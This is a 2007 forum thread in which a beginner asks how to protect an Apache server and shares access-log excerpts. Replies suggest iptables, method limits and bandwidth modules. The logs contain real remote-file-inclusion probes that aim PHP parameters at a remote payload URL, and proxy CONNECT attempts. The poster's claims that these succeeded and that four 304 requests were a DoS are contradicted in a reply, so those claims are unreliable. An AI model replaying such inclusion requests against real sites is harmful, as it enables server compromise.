123abc Posted September 5, 2007 Share Posted September 5, 2007 hi, i need help securing my apache server from attacks. can anyone give me some advice? here is some successful attack logs, copied from my servers access.log: 68.13.244.72 - - [04/Sep/2007:13:22:19 -0600] "GET / HTTP/1.1" 304 - 68.13.244.72 - - [04/Sep/2007:13:22:29 -0600] "GET / HTTP/1.1" 304 - 68.13.244.72 - - [04/Sep/2007:13:22:43 -0600] "GET / HTTP/1.1" 304 - 68.13.244.72 - - [04/Sep/2007:13:23:19 -0600] "GET / HTTP/1.1" 304 - 68.13.213.72 - - [04/Sep/2007:13:23:19 -0600] "GET / HTTP/1.1" 304 - this was a DOS attack of some sort. after a while my server crashed, then i got knocked completely off the internet (had to restart my modem/router) this is all the log showed at that time. 85.190.0.3 - - [04/Sep/2007:00:49:13 -0600] "CONNECT 213.92.8.7:31204 HTTP/1.0" 405 235 85.190.0.3 - - [04/Sep/2007:00:49:12 -0600] "POST http://213.92.8.7:31204/ HTTP/1.0" 200 274 64.71.165.195 - - [04/Sep/2007:00:49:21 -0600] "CONNECT 216.179.62.106:6667 HTTP/1.0" 405 235 213.195.77.166 - - [04/Sep/2007:09:21:20 -0600] "GET /ad_main.php?_mygamefile=http://www.sexyisabela.as.ro/a.txt?&/ HTTP/1.1" 404 209 213.195.77.166 - - [04/Sep/2007:09:21:20 -0600] "GET /live/help.php?css_path=http://www.sexyisabela.as.ro/a.txt?&/ HTTP/1.1" 404 211 213.195.77.166 - - [04/Sep/2007:09:21:21 -0600] "GET /php/mambo/index2.php?_REQUEST%5Boption%5D=com_content&_REQUEST%5BItemid%5D=1&GLOBALS=&mosConfig_absolute_path=http://www.sexyisabela.as.ro/a.txt?&/ HTTP/1.1" 404 218 213.195.77.166 - - [04/Sep/2007:09:21:21 -0600] "GET /dotproject/includes/db_adodb.php?baseDir=http://www.sexyisabela.as.ro/a.txt?&/ HTTP/1.1" 404 230 213.195.77.166 - - [04/Sep/2007:09:21:22 -0600] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.sexyisabela.as.ro/a.txt?&// HTTP/1.1" 404 268 213.195.77.166 - - [04/Sep/2007:09:21:22 -0600] "GET /phplive/setup/header.php?css_path=http://www.sexyisabela.as.ro/a.txt?&/ HTTP/1.1" 404 222 this was a successful PHP injection attack how can i prevent these attacks? i'm more concerned with the DOS attacks. i basically still have the default httpd config file, so if anyone has some advice on what i should add to it, (for security) i would appreciate it also some questions: - if my website is only for reading/viewing purposes, and nothing else, is it possible to completely refuse "CONNECT" and "POST" requests, and only allow "GET" requests ? if so, how - is there a way to limit my servers usage/bandwidth so it doesn't go over that amount and make my system crash? - does anyone know of a good firewall (software) that blocks all ICMP/ping requests to my machine? thanks to anyone that can help Quote Link to comment Share on other sites More sharing options...
trq Posted September 5, 2007 Share Posted September 5, 2007 Assuming this is a Linux machine, install and configure iptables. Quote Link to comment Share on other sites More sharing options...
123abc Posted September 5, 2007 Author Share Posted September 5, 2007 ok, thanks. i'm still new to running linux, so i'll read up on it Quote Link to comment Share on other sites More sharing options...
123abc Posted September 5, 2007 Author Share Posted September 5, 2007 man.. you have to have a lot of knowledge of how packets work in order to use iptables :-\ i'm getting a headache trying to figure out exactly what i need to do Quote Link to comment Share on other sites More sharing options...
trq Posted September 5, 2007 Share Posted September 5, 2007 There are a few different (simpler) interfaces to iptables that you can use. Ive never used them myself, but you might take a look at firestarter. I'm sure theres more around as well if you google them. Quote Link to comment Share on other sites More sharing options...
steviewdr Posted September 5, 2007 Share Posted September 5, 2007 hi, i need help securing my apache server from attacks. can anyone give me some advice? here is some successful attack logs, copied from my servers access.log: 68.13.244.72 - - [04/Sep/2007:13:22:19 -0600] "GET / HTTP/1.1" 304 - 68.13.244.72 - - [04/Sep/2007:13:22:29 -0600] "GET / HTTP/1.1" 304 - 68.13.244.72 - - [04/Sep/2007:13:22:43 -0600] "GET / HTTP/1.1" 304 - 68.13.244.72 - - [04/Sep/2007:13:23:19 -0600] "GET / HTTP/1.1" 304 - 68.13.213.72 - - [04/Sep/2007:13:23:19 -0600] "GET / HTTP/1.1" 304 - this was a DOS attack of some sort. after a while my server crashed, then i got knocked completely off the internet (had to restart my modem/router) this is all the log showed at that time. Was this all!!! - 4 304's? This on its own should not have caused the network to go down. If there were 1000's of entries in the log, that;d be something else. 85.190.0.3 - - [04/Sep/2007:00:49:13 -0600] "CONNECT 213.92.8.7:31204 HTTP/1.0" 405 235 85.190.0.3 - - [04/Sep/2007:00:49:12 -0600] "POST http://213.92.8.7:31204/ HTTP/1.0" 200 274 ^This seems to be of concern. 64.71.165.195 - - [04/Sep/2007:00:49:21 -0600] "CONNECT 216.179.62.106:6667 HTTP/1.0" 405 235 213.195.77.166 - - [04/Sep/2007:09:21:20 -0600] "GET /ad_main.php?_mygamefile=http://www.sexyisabela.as.ro/a.txt?&/ HTTP/1.1" 404 209 213.195.77.166 - - [04/Sep/2007:09:21:20 -0600] "GET /live/help.php?css_path=http://www.sexyisabela.as.ro/a.txt?&/ HTTP/1.1" 404 211 213.195.77.166 - - [04/Sep/2007:09:21:21 -0600] "GET /php/mambo/index2.php?_REQUEST%5Boption%5D=com_content&_REQUEST%5BItemid%5D=1&GLOBALS=&mosConfig_absolute_path=http://www.sexyisabela.as.ro/a.txt?&/ HTTP/1.1" 404 218 213.195.77.166 - - [04/Sep/2007:09:21:21 -0600] "GET /dotproject/includes/db_adodb.php?baseDir=http://www.sexyisabela.as.ro/a.txt?&/ HTTP/1.1" 404 230 213.195.77.166 - - [04/Sep/2007:09:21:22 -0600] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.sexyisabela.as.ro/a.txt?&// HTTP/1.1" 404 268 213.195.77.166 - - [04/Sep/2007:09:21:22 -0600] "GET /phplive/setup/header.php?css_path=http://www.sexyisabela.as.ro/a.txt?&/ HTTP/1.1" 404 222 ^ have you any of the above files?404 means file not found. how can i prevent these attacks? i'm more concerned with the DOS attacks. i basically still have the default httpd config file, so if anyone has some advice on what i should add to it, (for security) i would appreciate it also some questions: - if my website is only for reading/viewing purposes, and nothing else, is it possible to completely refuse "CONNECT" and "POST" requests, and only allow "GET" requests ? if so, how <directory /var/www/> Limit Get </directory> ^Something like that will work. - is there a way to limit my servers usage/bandwidth so it doesn't go over that amount and make my system crash? ^mod_bandwidth for apache - does anyone know of a good firewall (software) that blocks all ICMP/ping requests to my machine? iptables To install: apt-get install iptables To block IMCP: iptables -A INPUT -p icmp -j REJECT My wiki on iptables: http://wiki.kartbuilding.net/index.php/Iptables_Firewall -steve Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.